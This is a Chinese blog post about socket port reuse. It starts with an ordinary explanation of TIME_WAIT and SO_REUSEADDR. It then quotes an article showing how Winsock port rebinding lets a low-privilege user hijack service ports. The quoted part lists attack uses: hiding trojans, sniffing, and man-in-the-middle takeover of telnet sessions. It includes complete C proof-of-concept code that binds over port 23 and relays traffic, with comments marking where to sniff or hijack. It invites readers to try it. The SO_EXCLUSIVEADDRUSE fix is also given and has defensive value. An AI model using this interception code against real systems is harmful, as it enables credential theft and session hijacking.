zz端口劫持、端口重用和端口独占程序的设计

作者在 2010-10-19 20:50:08 发布以下内容
前段时间,一个朋友发来邮件,说在RedHat Linux 9.0 操作系统的机器上,编写了一个服务程序。该服务程序用Ctrl+C终止后,不能够马上重新运行。出现地址绑定错误,也就是调用bind()函数时,出现错 误。但过了几分钟后,即可以正常运行。不明白原因,并希望能给于解决。
 首先,来了解出现这个问题的原因。如果出现上面的情况,可以用 netstat -an 命令查看一下,就会发现那个服务程序所使用的端口处在CLOSE_WAIT状态。当程序执行主动关闭的时候,就会进入这种状态。还有一种情况,就是客户端 还在保持连接,但服务器却意外终止,这种情况,也会有这种状态产生,特别是在一些老的UNIX操作系统中,非常常见。例如SCO系统。那么这种状态要保持 多长时间呢?这种状态的端点留在该状态的持续时间是最长数据分组的生命周期MSL (Maximum Segment Lifetime)的两倍,也称为2MSL。因此,在这段时间内,程序是无法使用这个端口的,因为这个端口资源还没有完全释放。
 对于每个TCP 连接实现,都必须选择一个MSL值。在RFC1122文档中建议这个值是2分钟。而源自的Berkeley的实现传统上MSL这个值为30秒。这就意味着 TIME_WAIT状态可能保持1分钟到4分钟之间。而在这段时间内,使用这个端口就可能要到前面所说的那种障碍。
 
 问题产生的原因知道了,那么如何解决呢?套接字的选项中有一个SO_REUSEADDR选项,就可以解决这个问题。SO_REUSEADDR选项允许完全重复的绑定。这个选项通过setsockopt()来进行设置。先来看一下这个函数的定义格式:
       #include <sys/types.h>
       #include <sys/socket.h>

       int setsockopt(int s, int  level,  int  optname,  const  void  *optval,
       socklen_t optlen);

 s: 套接字,指向一个打开的套接口描述字
 level:级别,指定选项代码的类型。具体类型如下:
  SOL_SOCKET: 基本套接口
  IPPROTO_IP: IPv4套接口
  IPPROTO_IPV6: IPv6套接口
  IPPROTO_TCP: TCP套接口
 optname:选项名,选项名称
 optval: 选项值,是一个指向变量的指针类型
 optlen :选项长度,即 optval 的大小
 返回值:如果函数执行成功,返回0;如果函数执行失败,返回-1。

 因此,可以按照下面的伪代码来实现:
 
 int sockfd;
 int cflag;
 
 sockfd =socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 if(sockfd < 0) 
 {
  printf("socket() error\n");
  exit(-);
 }
 cflag = 1;
 if(setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,
   (char *)&cflag,sizeof(cflag)) == -1) 
 {
  printf("setsockopt() error\n");
  exit(-);  
 }

 上 面的代码演示了如何解决地址重复绑定的错误。但这段代码也无疑曝露了一个严重的安全问题,也就端口劫持。因为很有可能出现这种情况:一个程序正在正常地进 行通信,而一个含有恶意的程序利用这项功能,重新绑定了这个端口和地址,进行数据的窃取和篡改。当然在RedHat Linux 9.0 上没有发现有这个漏洞。但是在Windows中却不是这么回事。
 
 下面是从安全焦点(http://www.xfocus.net)网站中FLASHSKY(flashsky1@sina.com)的文章中节选的一段,说得非常好,还且还有例程。因此,照抄过来,和网络爱好者们一起分享。
 -------------------------------------------------
  因为在winsock的实现中,对于服务器的绑定是可以多重绑定的,在确定多重绑定使用谁的时候,根据一条原则是谁的指定最明确则将包递交给谁,而且没有权限之分,也就是说低级权限的用户是可以重绑定在高级权限的用户使用端口。例如绑定某个服务的端口上。
    这意味着什么呢?意味着可以进行如下的攻击:
    1. 一个木马绑定到一个已经合法存在的端口上进行端口的隐藏,他通过自己特定的包格式判断是不是自己的包。如果是自己的数据包则自己进行处理,如果不是通过127.0.0.1的地址交给真正的服务器应用进行处理。
    2. 一个木马可以在低权限用户上绑定高权限的服务应用的端口,进行该处理信息的嗅探,本来在一个主机上监听一个SOCKET的通讯需要具备非常高的权限要求, 但其实利用SOCKET重绑定,你可以轻易的监听具备这种SOCKET编程漏洞的通讯,而无须采用什么挂接、钩子或低层的驱动技术。
    3. 针对一些的特殊应用,可以发起中间人攻击,从低权限用户上获得信息或事实欺骗,如在guest权限下拦截telnet服务器的23端口,如果是采用 NTLM加密认证,虽然你无法通过嗅探直接获取密码,但一旦有admin用户通过你登陆以后,你的应用就完全可以发起中间人攻击,扮演这个登陆的用户通过 SOCKET发送高权限的命令,到达入侵的目的。
    4. 对于构建的WEB服务器,入侵者只需要获得低级的权限,就可以完全达到更改网页目的。很简单,扮演你的服务器给予连接请求以其他信息的应答,甚至是基于电子商务上的欺骗,获取非法的数据。

 其 实,Microsoft 自己的很多服务的SOCKET编程都存在这样的问题,telnet,ftp,http的服务实现全部都可以利用这种方法进行攻击,在低权限用户上实现对 SYSTEM应用的截听。包括W2K+SP3的IIS也都一样,那么如果你已经可以以低权限用户入侵或木马植入的话,而且对方又开启了这些服务的话,那就 不妨一试。并且我估计还有很多第三方的服务也大多存在这个漏洞。
    解决的方法很简单,在编写如上应用的时候,绑定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求独占所有的端口地址,而不允许复用。这样其他人就无法复用这个端口了。
    下面就是一个简单的截听Microsoft telnet服务器的例子,在GUEST用户下都能成功进行截听,剩余的就是大家根据自己的需要,进行一些特殊剪裁的问题了:如是隐藏,嗅探数据,高权限用户欺骗等。

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

DWORD WINAPI ClientThread(LPVOID lpParam);

int main()
{
    WORD wVersionRequested;
    DWORD ret;
    WSADATA wsaData;
    BOOL val;
    SOCKADDR_IN saddr;
    SOCKADDR_IN scaddr;
    int err;
    SOCKET s;
    SOCKET sc;
    int caddsize;
    HANDLE mt;
    DWORD tid;

    wVersionRequested = MAKEWORD( 2, 2 );
    err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 ) {
        printf("error!WSAStartup failed!\n");
        return -1;
    }
    saddr.sin_family = AF_INET;

    //截听虽然也可以将地址指定为INADDR_ANY,但是要不能影响正常应用情况下,应该指定具体的IP,留下127.0.0.1给正常的服务应用,然后利用这个地址进行转发,就可以不影响对方正常应用了
    saddr.sin_addr.s_addr = inet_addr("192.168.0.60");    
    saddr.sin_port = htons(23);
    if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
    {
        printf("error!socket failed!\n");
        return -1;
    }
    val = TRUE;
    //SO_REUSEADDR选项就是可以实现端口重绑定的
    if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
    {
        printf("error!setsockopt failed!\n");
        return -1;
    }
    //如果指定了SO_EXCLUSIVEADDRUSE,就不会绑定成功,返回无权限的错误代码;
    //如果是想通过重利用端口达到隐藏的目的,就可以动态的测试当前已绑定的端口哪个可以成功,就说明具备这个漏洞,然后动态利用端口使得更隐蔽
    //其实UDP端口一样可以这样重绑定利用,这儿主要是以TELNET服务为例子进行攻击
    if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
    {
        ret=GetLastError();
        printf("error!bind failed!\n");
        return -1;
    }
    listen(s,2);   
    while(1)
    {
        caddsize = sizeof(scaddr);
        //接受连接请求
        sc = accept(s,(struct sockaddr *)&scaddr,&caddsize);
        if(sc!=INVALID_SOCKET)
        {
            mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
            if(mt==NULL)
            {
                printf("Thread Creat Failed!\n");
                break;
            }
        }
        CloseHandle(mt);
    }
    closesocket(s);
    WSACleanup();
    return 0;
}

DWORD WINAPI ClientThread(LPVOID lpParam)
{
    SOCKET ss = (SOCKET)lpParam;
    SOCKET sc;
    unsigned char buf[4096];
    SOCKADDR_IN saddr;
    long num;
    DWORD val;
    DWORD ret;
    //如果是隐藏端口应用的话,可以在此处加一些判断
    //如果是自己的包,就可以进行一些特殊处理,不是的话通过127.0.0.1进行转发

    saddr.sin_family = AF_INET;
    saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
    saddr.sin_port = htons(23);
    if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
    {
        printf("error!socket failed!\n");
        return -1;
    }
    val = 100;
    if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
    {
        ret = GetLastError();
        return -1;
    }
    if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
    {
        ret = GetLastError();
        return -1;
    }
    if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
    {
        printf("error!socket connect failed!\n");
        closesocket(sc);
        closesocket(ss);
        return -1;
    }
    while(1)
    {
        //下面的代码主要是实现通过127。0。0。1这个地址把包转发到真正的应用上,并把应答的包再转发回去。
        //如果是嗅探内容的话,可以再此处进行内容分析和记录
        //如果是攻击如TELNET服务器,利用其高权限登陆用户的话,可以分析其登陆用户,然后利用发送特定的包以劫持的用户身份执行。
        num = recv(ss,buf,4096,0);
        if(num>0)
            send(sc,buf,num,0);
        else if(num==0)
            break;
        num = recv(sc,buf,4096,0);
        if(num>0)
            send(ss,buf,num,0);
        else if(num==0)
            break;
    }
    closesocket(ss);
    closesocket(sc);
    return 0 ;
}


转自:http://myfaq.com.cn/2005September/2005-09-13/202001.html

网络 | 阅读 1002 次
文章评论,共0条
游客请输入验证码
浏览27233次